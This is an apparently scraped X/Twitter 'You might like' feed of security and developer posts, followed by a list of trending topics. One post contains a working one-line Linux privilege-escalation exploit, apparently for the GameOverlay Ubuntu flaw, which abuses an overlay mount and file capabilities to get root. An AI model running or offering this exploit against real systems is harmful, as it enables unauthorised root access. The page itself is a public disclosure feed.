You might like
Good consolidated read on the xz stuff related to the person who added in the code boehs.org/node/everythin…
no documentation no confluence pages no jira tasks just you and the code
ok trying but I’m running out of spells
skill issue, learn how to use build tools or shut up
Ask an engineer to review a 15 lines of code and they’ll find plenty of issues. Ask them to review 1000 lines and they’ll say it looks good.
⚠️ We have reproduced CVE-2023-22515 in Atlassian Confluence. Broken access control allows unauthenticated users to gain administrative access to the web application! Update your software ASAP!
For @ScammerPayback 's People's Call Center event, it was @0dayCTF and I's personal project to write code to fool scammers into removing their webcam cover and showing their face. It was such an adrenaline rush to see it work.
We Abandoned Version Control and Saved Hundreds of Engineering Hours a Month. In the post below I will explain how you can directly deploy your code using FTP. No typescript, no cloud, no version control.
I’ve realized that I’m having much more fun writing N-day exploits than doing vuln research. It takes MUCH LESS time and equally sharpens your skills, maybe even more. Writing N-days with just a brief CVE description is very much like solving a CTF challenge.
Exploit is so easy it fits in a tweet🔥 unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
We found two 0-day vulnerabilities in @Ubuntu kernel and it all started by reading descriptions of old CVEs 📖 Thread about the discovery of #GameOverlay 🧵👇🏼
Tip: In @ChromeDevTools you can now hide network requests from Chrome extensions! 😍 Huge for focusing on just your code when profiling performance.
Software engineers when the product manager asks, “can’t we just do this, isn’t it easy?”
I've decided to stop using black hoodie hacker pictures to represent an attacker , and exclusively use geese instead - so far I'm satisfied with that decision
I hacked a car company. Here's how I gained access to hundreds of their codebases.
Analysis of the Fake Trezor Mobile Wallet app in the Play Store vavkamil.cz/2021/04/14/ana…
United States Trends
- 1. Expedition 33 20.4K posts
- 2. GOTY 13.6K posts
- 3. Moana 18.6K posts
- 4. Sonic 3 3,964 posts
- 5. #TheGameAwards 22.3K posts
- 6. #IDontWantToOverreactBUT 1,403 posts
- 7. Zelda 47.1K posts
- 8. #RestoreTheSnyderVerse 25.5K posts
- 9. #BuyTheDipNXXT 1,091 posts
- 10. #TSCollection 1,488 posts
- 11. Cher 18.2K posts
- 12. Cruz 45.9K posts
- 13. Split Fiction 3,843 posts
- 14. Hades 2 11.2K posts
- 15. Tyrod Taylor 2,144 posts
- 16. Silksong 31K posts
- 17. Jake Paul 11.9K posts
- 18. Rex Ryan N/A
- 19. Victory Monday 6,587 posts
- 20. $NXXT 2,552 posts
Something went wrong.
Something went wrong.